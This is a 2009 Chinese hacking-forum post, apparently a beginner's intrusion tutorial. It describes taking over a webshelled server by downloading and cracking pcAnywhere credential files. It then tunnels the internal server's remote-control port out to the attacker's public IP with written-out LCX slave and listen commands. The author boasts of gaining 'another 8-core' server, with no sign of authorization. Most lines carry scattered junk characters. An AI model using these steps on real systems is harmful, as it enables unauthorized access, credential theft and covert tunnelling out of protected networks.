|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。8 ^+ V* [( S. i9 l
, W+ `2 s D8 `4 J# J3 Q提权方法:pcanywhere+LCX
, q- }: ^* G* W1 o3 k- o
/ }9 v2 z2 S! D& X: ^% X0 Y获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
$ m5 P6 @+ z: h0 U3 `. E9 n, N
3 v p B0 J# O Q: e在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
* D+ \) _. ` \; J+ `- R7 v9 H* W: o2 P
. v$ X+ T- k$ ]: N1 T7 P查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。7 Y1 S% G8 ]# k! o) E: ~
B) A: y' o* y& G1 m. l) b+ _
; Q! \* M' @+ R/ o/ U. I8 d5 t呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。5 @4 U5 X8 ? M1 Y8 K) Z$ \& D2 ]
# {) {. c5 |" y& o, K8 Q
2 ]# m4 l3 i0 B) O( @
( c* Z. l3 o0 g9 j4 y8 I- X: G
! ~# s5 B' L$ [& Q由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``; t* c2 f/ l5 [" q4 p) h
( u! D8 P5 w6 e2 Y
& `* \: i; h8 S3 e
LCX的用法再简单说下:
0 b# |1 \4 L! g; J A* ~1 R8 ^, x$ ]5 Y3 x* s+ g0 B! R
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)- e* F( {" B8 L6 b' |
- I, W8 y4 h/ |7 _- P本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口) D8 l( ~3 D9 H! `
% k/ H0 C1 g' [! F |- I0 ?& b由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
1 _& d1 w3 z1 h7 `' k7 r: z% r顺便说下如果大家的机器在外网就不必再做端口映射之类的啦`` ^5 ~( d- H2 E1 {! f$ A9 S; k
6 I$ P# y: Q9 ~( K; i# v/ w+ S3 V1 l$ `$ A6 i
- |- _, I7 F/ S( k% |6 r
! L/ y/ X8 a0 B% m% e/ C5 ?呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
3 F8 O- N% g/ {: e* D# V7 h9 p( s- h8 }' `3 [) f
' T( J+ @ l9 @- t) X' w M8 k$ d, n! |! D, n2 @6 U
" D# K+ C3 ]2 X: r/ @我们本地连接试试,输入我们刚破解的账号密码
: P- L; A/ k8 O* E4 {) ~5 a0 g+ i" |+ w
/ ~) F9 r: B7 }7 ^6 w呵呵``连接成功,服务器不错,又一个8核^︵^: i9 e. Q4 U! e$ E, m
1 U/ _2 O h7 a" f& R6 {% K
! ?; G4 P( u+ F* g1 Y
: ^! V- K3 }/ ~3 [& u# A6 y4 d& R |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
